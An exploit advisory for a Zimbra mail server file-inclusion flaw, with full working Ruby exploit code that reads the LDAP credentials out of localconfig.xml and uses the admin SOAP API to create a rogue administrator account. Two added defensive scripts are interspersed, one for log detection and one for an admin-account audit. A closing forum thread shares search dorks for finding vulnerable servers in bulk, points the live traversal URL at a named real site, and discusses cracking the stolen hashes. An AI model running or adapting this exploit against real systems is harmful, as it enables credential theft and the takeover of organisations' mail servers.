# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch, just 0day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz.
The skin parameter is used to build a file path on the server, so a
directory-traversal value terminated with a null byte (%00) makes the server
embed /opt/zimbra/conf/localconfig.xml in the gzipped JavaScript bundle it
returns. localconfig.xml contains the LDAP credentials (zimbra_user and
zimbra_ldap_password). Those credentials are accepted as-is by AuthRequest on
the /service/admin/soap API; with the resulting auth token the script sends
CreateAccountRequest followed by ModifyAccountRequest with
zimbraIsAdminAccount=TRUE, which creates a user with administrative privileges
and gives access to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

----------------Exploit-----------------

Before using this exploit, the target server must have the admin console port
(7071) open, otherwise it won't work: the script sends both the file read and
the SOAP calls to port 7071. (The file read itself also works on the webmail
port, as the first example URL shows; only the admin SOAP API needs 7071.)

Use the exploit like this :

ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
 [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
 [*] Account : someuser@example.com
 [*] Password : Test123_23
[+] Successfully Exploited !
The number of vulnerable servers is huge, roughly 80 out of 100. This is for educational purposes only.
Affected versions: 2009, 2010, 2011, 2012 and early 2013
Test method:
http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
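The two probe URLs above are also the signature a defender should look for. The following is an added example, not code from the advisory or from Zimbra: it builds the probe URL for a host and scans web-server access-log lines for the same traversal, flagging any request for the named .js.zgz resource whose skin parameter contains "../" or a null byte, with localconfig.xml rated critical because that is the credential file the exploit reads. The log lines in SAMPLE_LOG are constructed for this example; the request target is percent-decoded once, as the server would decode it.

```ruby
#!/usr/bin/env ruby
require 'cgi'

# Added example (not part of the advisory): detect the Zimbra skin-parameter
# traversal in access logs. SAMPLE_LOG below is constructed, not real traffic.

# The resource named in the advisory, URL-decoded ("%20" -> space), no query.
VULN_RESOURCE = '/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz'.freeze

# Probe URL exactly as the advisory gives it, either on the webmail vhost or on
# the 7071 admin console (which prefixes /zimbraAdmin).
def probe_url(host, admin_console: false)
  base = admin_console ? "https://#{host}:7071/zimbraAdmin" : "https://#{host}"
  path = '/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz' \
         '?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00'
  base + path
end

# Inspect one request target ("/res/...?v=...&skin=..."). Returns nil for a
# benign request, otherwise a hash saying why it was flagged.
def classify_target(target)
  path, query = target.split('?', 2)
  return nil if query.nil?
  # Decode once, as the servlet container does, then compare the resource name.
  return nil unless CGI.unescape(path).end_with?(VULN_RESOURCE)
  skin = CGI.parse(query)['skin'].first      # CGI.parse unescapes values once
  return nil if skin.nil?
  traversal = skin.include?('../')
  null_byte = skin.include?("\0")            # %00 truncation used by the advisory
  return nil unless traversal || null_byte
  {
    file: skin.delete("\0"),
    traversal: traversal,
    null_byte: null_byte,
    severity: skin.include?('localconfig.xml') ? 'critical' : 'high'
  }
end

# Combined log format: client, identd, user, [timestamp], "METHOD target HTTP/x".
LOG_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/

# Scan lines and return one finding per flagged request (1-based line numbers).
def scan_access_log(lines)
  findings = []
  lines.each_with_index do |line, i|
    m = LOG_RE.match(line) or next
    hit = classify_target(m[2]) or next
    findings << hit.merge(line: i + 1, client: m[1])
  end
  findings
end

# Constructed sample: lines 2 and 4 are attacks, 1 and 3 are ordinary traffic.
SAMPLE_LOG = [
  '203.0.113.5 - - [06/Dec/2013:10:00:00 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 51234',
  '198.51.100.7 - - [06/Dec/2013:10:01:12 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 60211',
  '203.0.113.9 - - [06/Dec/2013:10:02:30 +0000] "GET /zimbra/ HTTP/1.1" 200 4321',
  '198.51.100.7 - - [06/Dec/2013:10:03:05 +0000] "GET /zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 52018'
].freeze

if __FILE__ == $0
  lines = ARGV.empty? ? SAMPLE_LOG : File.readlines(ARGV[0])
  scan_access_log(lines).each do |f|
    puts "line #{f[:line]} #{f[:client]} #{f[:severity]} skin=#{f[:file]}"
  end
end
```

Run it with a real access log as the first argument to scan that file instead of the sample. A hit on the admin console path means the attacker also had port 7071 reachable, which is the precondition the advisory states for the account-creation part of the exploit.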
run.rb:
#!/usr/bin/ruby
#
# Author: Eduardo Rubina H.
# Email : rubina119[at]gmail.com
# Date  : 03 Dec 2013
# State : Critical
#
# Description : This script exploits a Local File Inclusion in
# /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
# which allows us to read localconfig.xml. That file contains the LDAP root
# credentials, which let us make requests to the /service/admin/soap API to
# create a user with administrative privileges, and a lot more; the LFI also
# lets you read .bash_history, SSH public keys, config files, etc.
#
# LFI : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
#

require 'net/https'
require 'getoptlong'
require 'zlib'       # the response is gzip-encoded and is decompressed by hand
require 'stringio'
require './ultils.rb'

LFI_PATH = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz" \
           "?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
USER_AGENT = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"

# Step 1: fetch the messages bundle with the traversal in "skin", gunzip it and
# pull the LDAP credentials out of the embedded localconfig.xml.
def exploit_begin()
  puts "[+] Looking if host is vuln..."
  http = Net::HTTP.new($host, 7071)
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
  req = Net::HTTP::Get.new(LFI_PATH, { "Accept-Encoding" => "gzip", "User-Agent" => USER_AGENT })
  res = http.request(req)
  case res
  when Net::HTTPSuccess then
    begin
      if res.header['Content-Encoding'].eql?('gzip') then
        sio = StringIO.new(res.body)
        gz = Zlib::GzipReader.new(sio)
        puts "[+] Host is vuln exploiting"
        resbody = gz.read()
        # The XML comes back wrapped in JavaScript string literals: flatten it
        # and strip the "a[" wrapper so the <value> elements can be matched.
        part1 = resbody.gsub("\n", ' ').squeeze(' ')
        part2 = part1.gsub("a[", '').squeeze(' ')
        ldap_user = part2.match(/name=\\"zimbra_user\\">"; "<value>(.*?)<\/value>/ui)[1]
        ldap_pass = part2.match(/name=\\"zimbra_ldap_password\\">"; "<value>(.*?)<\/value>/ui)[1]
        get_auth_token(ldap_user, ldap_pass)
      else
        puts "[-] Host is not vulnerable !"
        return false
      end
    rescue Exception
      #puts "[-] Connection Failed !"
      return false
    end
  else
    puts "[-] Host is not vulnerable !"
    return false
  end
end

# Step 2: authenticate to the admin SOAP endpoint with the stolen LDAP
# credentials and keep the returned authToken for the following calls.
def get_auth_token(user, pass)
  https = Net::HTTP.new($host, 7071)
  path = "/service/admin/soap"
  https.use_ssl = true
  https.verify_mode = OpenSSL::SSL::VERIFY_NONE
  body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> " \
         "<env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\">" \
         "<env:Header><ns2:context/></env:Header>" \
         "<env:Body><ns1:AuthRequest><account by=\"name\">#{user}</account><password>#{pass}</password></ns1:AuthRequest></env:Body>" \
         "</env:Envelope>"
  data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin#AuthRequest\"" })
  $auth_key = data.body.match(/<authToken>(.*)<\/authToken>/iu)[1]
  exploit()
end

# Step 3: find the domain, create the account and flag it as an admin account.
def exploit()
  puts "[+] Obtaining Domain Name"
  get_domain_soap_data = "<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>"
  get_domain = Utils.new.request_soap_admin(get_domain_soap_data)
  return false unless get_domain
  domain = get_domain.match(/<a n=\"zimbraDomainName\">(.*?)<\/a>/iu)[1]

  puts "[+] Creating Account"
  create_account_soap_data = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>#{$user}@#{domain}</name><password>#{$password}</password></CreateAccountRequest>"
  create_account = Utils.new.request_soap_admin(create_account_soap_data)
  return false unless create_account
  a_id = create_account.match(/account id="(.*)" name="/ui)[1]

  puts "[+] Elevating Privileges"
  elevate_privs_soap_data = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>#{a_id}</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>"
  elevate_privs = Utils.new.request_soap_admin(elevate_privs_soap_data)
  return false unless elevate_privs

  puts "[+] Login Credentials"
  puts " [*] Login URL : https://#{domain}:7071/zimbraAdmin/ "
  puts " [*] Account : #{$user}@#{domain}"
  puts " [*] Password : #{$password}"
  puts "[+] Successfully Exploited !"
end

def usage
  print <<~USAGE
    -t, --target       Host to attack, IP or domain
    -u, --useraccount  The user name to be used to create the account, alphanumeric chars only.
    -p, --password     Password that will be used to create the account; needs to be
                       alphanumeric, upper and lower case, with special chars, minimum 8 chars.
    -h, --help         Print this help message
  USAGE
end

puts ""
puts ""
puts "#########################################################################################"
puts "Zimbra Email Collaboration Server 0day Exploit by rubina119"
puts "#########################################################################################"
puts ""
puts ""

opts = GetoptLong.new(
  [ '--target',      '-t', GetoptLong::REQUIRED_ARGUMENT ],
  [ '--useraccount', '-u', GetoptLong::REQUIRED_ARGUMENT ],
  [ '--password',    '-p', GetoptLong::REQUIRED_ARGUMENT ],
  [ '--help',        '-h', GetoptLong::OPTIONAL_ARGUMENT ]
)

opts.each do |opt, arg|
  case opt
  when '--help'
    usage()
    exit
  when '--target'
    $host = arg
  when '--useraccount'
    $user = arg
  when '--password'
    $password = arg
  end
end

# All three values are used later (host for every request, user and password
# for CreateAccountRequest), so refuse to start without them.
if $host.nil? || $user.nil? || $password.nil?
  usage()
else
  exploit_begin()
end
ultils.rb
#!/usr/bin/ruby
require 'net/https'

class Utils
  # Send one admin SOAP request body to port 7071, wrapped in an envelope that
  # carries the authToken obtained from AuthRequest. Returns the raw response
  # body, or false (after printing the fault text) when the server answers with
  # a SOAP error.
  def request_soap_admin(api_call)
    @request = api_call
    soap_client = Net::HTTP.new($host, 7071)
    soap_client.use_ssl = true
    soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE
    soap_path = "/service/admin/soap"
    soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\">" \
                "<soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header>" \
                "<soap:Body>#{@request}</soap:Body></soap:Envelope>"
    response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" })
    if response.body.match(/Error/)
      error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]
      puts "[-] Response Error"
      puts " [*] #{error_res}"
      false
    else
      return response.body
    end
  end
end
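The defender's counterpart to the CreateAccountRequest / ModifyAccountRequest sequence above is to list the accounts that currently have admin rights and check them against what is expected. The following is an added example, not code from the advisory or from Zimbra: it builds a GetAllAdminAccountsRequest envelope in the same layout the Utils class above uses, parses the response, and flags admin accounts that are not on an allowlist or whose zimbraCreateTimestamp is later than a given cut-off (the exploit's account is created at the moment the attacker runs it). The SOAP response below is constructed for this example; the element and attribute names are the ones the urn:zimbraAdmin API uses. On the server itself, zmprov gaaa lists the same accounts.

```ruby
#!/usr/bin/env ruby

# Added example (not part of the advisory): audit Zimbra admin accounts after a
# suspected compromise. SAMPLE_RESPONSE is constructed for this example.

# Envelope for GetAllAdminAccountsRequest, carrying an admin auth token, in the
# same shape as the page's Utils#request_soap_admin.
def admin_accounts_envelope(auth_token)
  "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\">" \
  "<soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{auth_token}</authToken></context></soap:Header>" \
  "<soap:Body><GetAllAdminAccountsRequest xmlns=\"urn:zimbraAdmin\"/></soap:Body></soap:Envelope>"
end

# Pull every <account ...>...</account> out of the response. The name and id
# attributes are read independently, so their order in the tag does not matter.
def parse_admin_accounts(xml)
  xml.scan(%r{<account\b([^>]*)>(.*?)</account>}m).map do |tag_attrs, body|
    attrs = body.scan(%r{<a n="([^"]+)">([^<]*)</a>}).to_h
    {
      name: tag_attrs[/\bname="([^"]*)"/, 1],
      id: tag_attrs[/\bid="([^"]*)"/, 1],
      created: attrs['zimbraCreateTimestamp'],   # YYYYMMDDHHMMSSZ or nil
      attrs: attrs
    }
  end
end

# Flag admins that are not on the expected list or were created after `since`.
# zimbraCreateTimestamp is YYYYMMDDHHMMSSZ, so plain string comparison orders
# correctly; accounts without a timestamp are judged by the allowlist only.
def rogue_admins(accounts, expected:, since:)
  accounts.select do |a|
    !expected.include?(a[:name]) || (a[:created] && a[:created] > since)
  end
end

# Constructed response: one long-standing admin and one account created the
# evening the advisory was published, as the exploit would leave behind.
SAMPLE_RESPONSE = <<~XML
  <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body><GetAllAdminAccountsResponse xmlns="urn:zimbraAdmin">
  <account name="admin@example.com" id="0a1b2c3d-0000-4000-8000-000000000001">
  <a n="zimbraIsAdminAccount">TRUE</a><a n="zimbraCreateTimestamp">20120115083000Z</a></account>
  <account id="0a1b2c3d-0000-4000-8000-000000000002" name="someuser@example.com">
  <a n="zimbraIsAdminAccount">TRUE</a><a n="zimbraCreateTimestamp">20131206231500Z</a></account>
  </GetAllAdminAccountsResponse></soap:Body></soap:Envelope>
XML

if __FILE__ == $0
  accounts = parse_admin_accounts(SAMPLE_RESPONSE)
  rogue_admins(accounts, expected: ['admin@example.com'], since: '20131201000000Z').each do |a|
    puts "suspicious admin: #{a[:name]} (id #{a[:id]}, created #{a[:created]})"
  end
end
```

To run it against a live server, post admin_accounts_envelope(token) to /service/admin/soap on port 7071 with the same Content-Type header Utils uses and feed the response body to parse_admin_accounts. Any account it flags should be checked against the account-creation entries in the Zimbra audit log before it is deleted.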
Bulk search method: title:zimbra web client sign in (tested on Baidu, one search turns up a whole pile)
Even where 7071 is not open, the config file can still be included; not sure whether the encrypted data in it can be cracked.
WooYun discussion:
1#
火星人 (不会技术活) | 2013-12-09 16:56
Can this be done in bulk?
2#
生生不息 | 2013-12-09 17:11
Another file inclusion. 7071 is the default port, so it can be done in bulk.
3#
dren | 2013-12-09 17:28
Nice.
4#
hacker@sina.cn | 2013-12-09 18:29
This is truly awesome. Test site: https://mail.ecmwf.int/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
5#
hacker@sina.cn | 2013-12-09 18:49
This is truly awesome; too bad it doesn't run as root by default. Also, does anyone know what encryption the password uses?
6#
无敌L.t.H (:?门安天京北爱我) | 2013-12-09 19:51
Looks like a whole pile of .EDU sites are going to get hit.
7#
猪猪侠 (A) | 2013-12-09 20:01
@hacker@sina.cn OpenLDAP SHA
8#
if、so (no talk,but shell!!) | 2013-12-09 20:11
@猪猪侠 Yes
9#
if、so (no talk,but shell!!) | 2013-12-09 20:11
@猪猪侠 Just looked it up on Baidu
10#
circus | 2013-12-09 20:43
@if、so Good stuff
11#
circus | 2013-12-09 20:51
@if、so inurl:7071 -intext:7071 inurl:zimbra
12#
circus | 2013-12-09 20:52
inurl:7071 intitle:zimbra administration
13#
hacker@sina.cn | 2013-12-09 21:53
Couldn't find a matching hash mode in hashcat; nearly all the SSHA attempts failed.
14#
Jacks | 2013-12-10 01:16
The 7071 port has been changed; is there a way to find the port? Also, @猪猪侠, once you have LDAP, how do you get all the users' hashes?
15#
luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2013-12-10 09:42
mark